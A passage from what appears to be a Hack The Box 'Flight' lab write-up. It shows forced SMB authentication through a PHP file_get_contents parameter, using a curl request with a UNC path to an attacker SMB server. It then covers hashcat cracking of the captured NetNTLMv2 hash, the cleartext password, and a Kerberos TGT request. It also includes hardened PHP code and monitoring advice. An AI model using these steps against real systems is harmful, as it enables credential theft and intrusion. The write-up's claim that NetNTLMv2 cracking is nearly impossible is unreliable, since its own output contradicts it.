PHP Inclusion Over SMB
The inclusion vulnerability identified earlier in the virtual host, school.flight.htb, was initially suspected to stem from misuse of the PHP include function. It turns out that the page uses PHP's file_get_contents function for inclusion. While this alone prevents PHP code execution, there is another aspect of PHP to consider when it is configured and hosted on a Windows host.
When running on a Windows host, PHP can fetch remote resources over SMB: a UNC path such as //host/share/file is handled by the operating system like any other filesystem path. This convenience has a drawback, because opening such a path triggers SMB authentication, and the web server's service account inadvertently discloses its credentials (as a NetNTLMv2 challenge-response) to whichever host the path points at.
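The following added example is not code from the original write-up or from the box; it shows the vulnerable pattern the post describes (a request parameter passed straight to file_get_contents) beside a hardened version. The view parameter name, the pages/ directory and the allowed page names are assumptions for illustration, and PHP 8 is assumed for str_starts_with and the union return type.

```php
<?php
// Added example, not the original application's code. Parameter name 'view',
// the pages/ directory and the allowed page names are assumptions.

// Vulnerable: the request value is handed directly to file_get_contents().
// On Windows a value such as //attacker/share (or \\attacker\share) resolves as a
// UNC path, so the server opens an SMB connection and authenticates as the
// service account running the web server. Disabling allow_url_fopen does not
// help, because a UNC path is a plain filesystem path, not a stream wrapper.
function render_view_vulnerable(string $view): string|false
{
    return file_get_contents($view);
}

// Defence in depth: reject anything that looks like a UNC path or a stream
// wrapper before it reaches the filesystem layer.
function looks_like_remote_path(string $value): bool
{
    return str_starts_with($value, '\\\\')                         // \\host\share
        || str_starts_with($value, '//')                           // //host/share
        || (bool) preg_match('#^[a-z][a-z0-9+.-]*://#i', $value);  // php://, http:// ...
}

// Hardened: only a fixed set of page names is accepted, and the resolved path
// is canonicalised and checked to sit inside the intended directory.
function render_view_hardened(string $view, string $baseDir): string
{
    $allowed = ['home', 'about', 'blog', 'index'];   // assumed page names
    if (looks_like_remote_path($view) || !in_array($view, $allowed, true)) {
        http_response_code(400);
        return 'invalid view';
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $view . '.html');
    $prefix = ($base === false) ? false : $base . DIRECTORY_SEPARATOR;
    if ($prefix === false || $path === false || !str_starts_with($path, $prefix)) {
        http_response_code(404);
        return 'not found';
    }

    $content = file_get_contents($path);
    return ($content === false) ? '' : $content;
}

// Usage (assumed layout: the page templates live in pages/ next to this script).
$view = $_GET['view'] ?? 'home';
echo render_view_hardened($view, __DIR__ . DIRECTORY_SEPARATOR . 'pages');
```

The allowlist is the actual control; the UNC and wrapper pre-check only guards against mistakes elsewhere in the code, since Windows also accepts mixed-slash and long-path spellings that a blocklist can miss. On the monitoring side, the same behaviour is visible as the web server's service account authenticating over SMB to hosts it has no business contacting, which is worth alerting on regardless of how the web code is written.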
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ simplesmb . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Setting up an arbitrary SMB server on Kali
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ curl http://school.flight.htb/index.php?view=//10.10.16.8/blahblah
Sending in a request with the Kali SMB server in the view parameter. This should trigger the authentication.
The web application has indeed authenticated and connected to the Kali SMB server.
It would appear that svc_apache is the service account behind the web server.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat --show svc_apache.hash
5600 | NetNTLMv2 | Network Protocol
In most cases, cracking a NetNTLMv2 hash is very difficult, if not impossible, because it is a salted challenge-response rather than a reusable hash.
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat -a 0 -m 5600 svc_apache.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d1cd6f05c2c4263d97741bc6f5a5c8be:010100000000000080ded004642cda0163950dff043f3299000000000100100052005400680068006c004a00650041000300100052005400680068006c004a00650041000200100062004d005a00760064004300760077000400100062004d005a00760064004300760077000700080080ded004642cda0106000400020000000800300030000000000000000000000000300000f377ff619a9971b9151148f0afd73f23298106c88f89e83fb08af98d19b03ad30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d1cd6f05c2c4263...000000
Time.Started.....: Mon Dec 11 19:59:23 2023 (5 secs)
Time.Estimated...: Mon Dec 11 19:59:28 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2400.8 kH/s (0.78ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10665984/14344386 (74.36%)
Rejected.........: 0/10665984 (0.00%)
Restore.Point....: 10662912/14344386 (74.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: S@m@nth@!? -> Ryanpotts
Hardware.Mon.#1..: Util: 58%
Stopped: Mon Dec 11 19:59:29 2023
However, hashcat cracked the password hash. The cracked password for the svc_apache account is S@Ss!K@*t13.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ impacket-getTGT flight.htb/svc_apache@g0.flight.htb -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: S@Ss!K@*t13
[*] Saving ticket in svc_apache@g0.flight.htb.ccache
Validated against the target KDC: a TGT was issued and saved for the svc_apache account.